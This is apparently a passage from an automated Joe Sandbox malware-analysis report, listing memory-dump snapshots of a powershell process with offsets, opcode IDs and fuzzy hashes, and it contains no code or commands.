          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 03e906eba59af12a4fb87b50bc0df802033afce89ecb31ed052bc8344f738e19
          • Instruction ID: 02b7d617b432c38d4c175b459ef79c767f21330aee8f1fc63a3e9ed05db97fc6
          • Opcode Fuzzy Hash: 03e906eba59af12a4fb87b50bc0df802033afce89ecb31ed052bc8344f738e19
          • Instruction Fuzzy Hash: 96012930701605DFE755AF38D844A5AB3A2FBCA2157148A7DD00E9BB10EB35E806CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f9e1bd8b7f568c7d8fd3c45af502d282e2cdd19a1790708e5c8b1f38ddc2f8d7
          • Instruction ID: a68b6d4bfbe631e916132f662710b636e21d340bcc89aa788db2eda6cb1d48a2
          • Opcode Fuzzy Hash: f9e1bd8b7f568c7d8fd3c45af502d282e2cdd19a1790708e5c8b1f38ddc2f8d7
          • Instruction Fuzzy Hash: AB01B12200E3D09FE7128B258C94B52BFB4DF43224F1DC0DBD9898F1A3C2695849C772
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 282a49e1d32e401a35de37fdd483f2c1ee2dded3726374b8bade379f154ee565
          • Instruction ID: 3ba64651582070844606f401c584db87d88be1c739257efc43b502b713fed091
          • Opcode Fuzzy Hash: 282a49e1d32e401a35de37fdd483f2c1ee2dded3726374b8bade379f154ee565
          • Instruction Fuzzy Hash: 5F01F7314483649BE7204E15DC80F67FBA8DF81638F18C01AEE464B252C3799849C6B2
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9be88658ad6f6f3c9039af2b167527133dd03dc51a54b7250546b84816e9585f
          • Instruction ID: 645afcd0b8e2fae77b53147287ec62d4b3b09aeb9199e8c45bc125c55cfd984f
          • Opcode Fuzzy Hash: 9be88658ad6f6f3c9039af2b167527133dd03dc51a54b7250546b84816e9585f
          • Instruction Fuzzy Hash: EFF0213131021057F7089A7AB8947AE779BEBC5721F108479E50AC73C1DE76DC4A8760
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ab409ce7a6451148576485870c18a45c66d1b8f377abd067376fbb0918bdc499
          • Instruction ID: 396999b653f9ebcacd9d5da8dffa61bf927cddf675a70a3616ea17bba5974e2e
          • Opcode Fuzzy Hash: ab409ce7a6451148576485870c18a45c66d1b8f377abd067376fbb0918bdc499
          • Instruction Fuzzy Hash: 77F0F4317443506BE718A679AC94B9F3793AFC8B10FA44A6CE0425F385CDA46C0A4B98
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4b71d8b081c2be9e4c9bf64aa9cc4c6d162ce6613e1f1bfe4a5e3ed4f8427a1b
          • Instruction ID: 8be41133fbad6bb8ca212f94c31b2473bcbc646984b2b6708ce394cf16ffea76
          • Opcode Fuzzy Hash: 4b71d8b081c2be9e4c9bf64aa9cc4c6d162ce6613e1f1bfe4a5e3ed4f8427a1b
          • Instruction Fuzzy Hash: AAF0F6357002101BE7089A7AA4D47AA67D7AFC8310F24857DE60A8B7C5DDB59C0A8B50
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 11322f9c74e7142e8b111e2e717f994d07a9a3056a7b872073f7a7ae02fecb56
          • Instruction ID: 1937640d3328ec1b5c055bda46d1d1fe22fe7dfec7bf4084b28bfd7b6cce2ca0